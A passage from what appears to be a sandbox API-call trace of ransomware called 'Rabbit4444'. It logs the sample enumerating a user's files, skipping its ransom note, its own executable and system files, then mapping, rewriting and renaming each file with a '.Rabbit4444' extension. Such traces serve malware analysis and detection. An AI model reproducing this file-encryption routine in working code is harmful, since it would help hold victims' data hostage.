out: hHeap=0xe0000) returned 1 [0058.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.883] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0058.883] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15019389885) returned 1 [0058.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0058.883] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0058.883] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.883] CloseHandle (hObject=0x298) returned 1 [0058.883] CloseHandle (hObject=0x278) returned 1 [0058.883] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms.Rabbit4444") returned 192 [0058.884] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{63929d0b-aaac-4dca-ae8a-222ec37f7a88}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{63929d0b-aaac-4dca-ae8a-222ec37f7a88}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.884] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fea715d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4fea715d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x221b864e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x441, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", cAlternateFileName="CL40A3~1.SET")) returned 1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2=".") returned 1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="..") returned 1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="windows") returned -1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="boot") returned 1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.884] lstrcmpiW (lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.885] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms" | out: lpString1="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms") returned="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms" [0058.885] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.885] lstrlenW (lpString="Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms") returned 64 [0058.885] lstrlenW (lpString="Rabbit4444") returned 10 [0058.885] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.885] lstrlenW (lpString=".dll") returned 4 [0058.885] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.885] lstrlenW (lpString=".lnk") returned 4 [0058.885] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.885] lstrlenW (lpString=".ini") returned 4 [0058.885] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.885] lstrlenW (lpString=".sys") returned 4 [0058.885] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{641102ef-6463-46e9-842d-176013d7acc8}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.885] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.886] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15019630151) returned 1 [0058.886] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1089) returned 1 [0058.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0058.886] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0058.887] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0058.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0058.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.888] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0058.888] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15019892949) returned 1 [0058.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.888] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0058.888] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.888] CloseHandle (hObject=0x298) returned 1 [0058.888] CloseHandle (hObject=0x278) returned 1 [0058.889] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms.Rabbit4444") returned 192 [0058.889] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{641102ef-6463-46e9-842d-176013d7acc8}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{641102ef-6463-46e9-842d-176013d7acc8}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.889] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502f95fa, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x502f95fa, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", cAlternateFileName="CL7C48~1.SET")) returned 1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2=".") returned 1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="..") returned 1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="windows") returned -1 [0058.889] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.890] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.890] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="boot") returned 1 [0058.890] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.890] lstrcmpiW (lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.890] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms" | out: lpString1="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms") returned="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms" [0058.890] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.890] lstrlenW (lpString="Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms") returned 64 [0058.890] lstrlenW (lpString="Rabbit4444") returned 10 [0058.890] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.890] lstrlenW (lpString=".dll") returned 4 [0058.890] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.890] lstrlenW (lpString=".lnk") returned 4 [0058.890] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.890] lstrlenW (lpString=".ini") returned 4 [0058.890] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.890] lstrlenW (lpString=".sys") returned 4 [0058.890] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.890] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6775cca4-cc42-44f7-800c-4e94ff1ea8c0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.890] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.891] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15020128708) returned 1 [0058.891] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=966) returned 1 [0058.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.891] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0058.891] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.892] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.893] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.894] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.894] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15021522719) returned 1 [0058.905] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.905] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0058.905] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.905] CloseHandle (hObject=0x298) returned 1 [0058.905] CloseHandle (hObject=0x278) returned 1 [0058.905] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms.Rabbit4444") returned 192 [0058.905] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6775cca4-cc42-44f7-800c-4e94ff1ea8c0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{6775cca4-cc42-44f7-800c-4e94ff1ea8c0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.906] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x504c3240, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x504c3240, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", cAlternateFileName="CLC6CA~1.SET")) returned 1 [0058.906] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.906] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.906] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.906] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2=".") returned 1 [0058.906] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="..") returned 1 [0058.907] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="windows") returned -1 [0058.907] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.907] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.907] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="boot") returned 1 [0058.907] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.907] lstrcmpiW (lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.907] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms" | out: lpString1="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms") returned="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms" [0058.907] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.907] lstrlenW (lpString="Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms") returned 64 [0058.907] lstrlenW (lpString="Rabbit4444") returned 10 [0058.907] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.907] lstrlenW (lpString=".dll") returned 4 [0058.907] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.907] lstrlenW (lpString=".lnk") returned 4 [0058.907] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.907] lstrlenW (lpString=".ini") returned 4 [0058.907] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.907] lstrlenW (lpString=".sys") returned 4 [0058.907] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.907] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.908] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.908] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15021873586) returned 1 [0058.908] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1024) returned 1 [0058.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0058.908] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0058.927] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0058.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0058.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0058.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.929] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15023962959) returned 1 [0058.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0058.929] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.929] CloseHandle (hObject=0x298) returned 1 [0058.929] CloseHandle (hObject=0x278) returned 1 [0058.929] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms.Rabbit4444") returned 192 [0058.929] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.930] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50771ca2, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x50771ca2, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22335dcf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", cAlternateFileName="CL96AE~1.SET")) returned 1 [0058.930] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.930] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.930] lstrcmpiW (lpString1="classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.930] lstrcmpiW 